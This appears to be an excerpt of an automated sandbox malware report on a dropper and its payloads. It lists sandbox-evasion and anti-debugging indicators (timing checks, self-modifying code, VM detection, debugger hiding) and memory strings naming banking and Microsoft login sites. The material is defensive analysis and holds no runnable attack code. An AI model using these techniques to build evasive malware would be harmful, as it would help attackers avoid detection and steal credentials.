Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0D03 second address: 4FB0D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0D07 second address: 4FB0D63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F7A2CC6ACF4h 0x0000000f mov edx, ecx 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 jmp 00007F7A2CC6ACECh 0x0000001a mov ebp, esp 0x0000001c jmp 00007F7A2CC6ACF0h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7A2CC6ACF7h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0D63 second address: 4FB0D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2D39F174h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0D7B second address: 4FB0D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Special instruction interceptor: First address: 62C61E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Special instruction interceptor: First address: 7EBE16 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Special instruction interceptor: First address: 62ECEE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Special instruction interceptor: First address: 8626C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 45C61E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 61BE16 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 45ECEE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 6926C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 92CCF8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: AF8A58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 92CC4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: AE37F4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Special instruction interceptor: First address: CED0DE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Special instruction interceptor: First address: EBCCAB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Special instruction interceptor: First address: CEF9FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Special instruction interceptor: First address: F196E3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Special instruction interceptor: First address: 29DCD0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Special instruction interceptor: First address: 29DD9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Special instruction interceptor: First address: 4518E8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Special instruction interceptor: First address: 44FF02 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Special instruction interceptor: First address: 29B486 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Special instruction interceptor: First address: 475DD8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Special instruction interceptor: First address: 45EF32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Special instruction interceptor: First address: 4E3B08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 63EDCD0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 63EDD9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 65A18E8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 659FF02 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 63EB486 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 65C5DD8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 65AEF32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 6633B08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Special instruction interceptor: First address: 2A3395 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Special instruction interceptor: First address: 63F3395 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Memory allocated: 4AA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Memory allocated: 4CC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Memory allocated: 4AA0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Code function: 0_2_04FC029B rdtsc 0_2_04FC029B
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 3849 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 4405 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Window / User API: threadDelayed 739
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Window / User API: threadDelayed 518
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Window / User API: threadDelayed 9999
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1840 Thread sleep count: 118 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1840 Thread sleep time: -236118s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1824 Thread sleep count: 112 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1824 Thread sleep time: -224112s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1308 Thread sleep count: 108 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1308 Thread sleep time: -216108s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3340 Thread sleep count: 314 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3340 Thread sleep time: -9420000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1916 Thread sleep count: 113 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1916 Thread sleep time: -226113s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1848 Thread sleep count: 3849 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1848 Thread sleep time: -7701849s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3276 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2168 Thread sleep count: 113 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2168 Thread sleep time: -226113s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1848 Thread sleep count: 4405 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1848 Thread sleep time: -8814405s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 3776 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 4668 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 1012 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 6832 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 6784 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 7740 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 7616 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 7624 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 7732 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 7744 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe TID: 7712 Thread sleep time: -50025s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe TID: 2348 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe TID: 3800 Thread sleep count: 518 > 30
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe TID: 3800 Thread sleep count: 139 > 30
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe TID: 3916 Thread sleep count: 9999 > 30
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe TID: 3916 Thread sleep time: -99990s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Thread sleep count: Count: 9999 delay: -10
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Adobe Jump to behavior
Source: skotes.exe, skotes.exe, 00000003.00000002.1532394072.00000000005EC000.00000040.00000001.01000000.00000007.sdmp, e2af9f55fd.exe, e2af9f55fd.exe, 0000000A.00000002.2253762327.0000000000E78000.00000040.00000001.01000000.0000000A.sdmp, f20b4c0961.exe, f20b4c0961.exe, 0000000B.00000002.2765921853.0000000000AB4000.00000040.00000001.01000000.00000009.sdmp, f20b4c0961.exe, 0000000B.00000002.2784743127.0000000005D91000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: f20b4c0961.exe, 0000000B.00000003.2363682033.0000000005444000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696494690p
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.0000000001302000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000002.2763484000.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2456139673.00000272847A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2456139673.00000272847AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: f20b4c0961.exe, 0000000B.00000002.2763484000.0000000000713000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: f20b4c0961.exe, 0000000B.00000002.2780886405.00000000054AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: (i6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: firefox.exe, 00000019.00000002.2456139673.00000272847E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.0000000001302000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW}J0*
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.00000000012D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpg0
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.000000000128E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: firefox.exe, 00000019.00000002.2456139673.00000272847E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>v
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 2fQ8fpTWAP.exe, 00000000.00000002.1484097548.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1523152108.00000000005EC000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1532394072.00000000005EC000.00000040.00000001.01000000.00000007.sdmp, e2af9f55fd.exe, 0000000A.00000002.2253762327.0000000000E78000.00000040.00000001.01000000.0000000A.sdmp, f20b4c0961.exe, 0000000B.00000002.2765921853.0000000000AB4000.00000040.00000001.01000000.00000009.sdmp, f20b4c0961.exe, 0000000B.00000002.2784743127.0000000005D91000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: f20b4c0961.exe, 0000000B.00000002.2763484000.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp4k%SystemRoot%\system32\mswsock.dll+
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: f20b4c0961.exe, 0000000B.00000003.2365560124.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe System information queried: CodeIntegrityInformation
Source: C:\Windows\SysWOW64\taskkill.exe System information queried: CodeIntegrityInformation
Hides threads from debuggers
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Process queried: DebugPort Jump to behavior
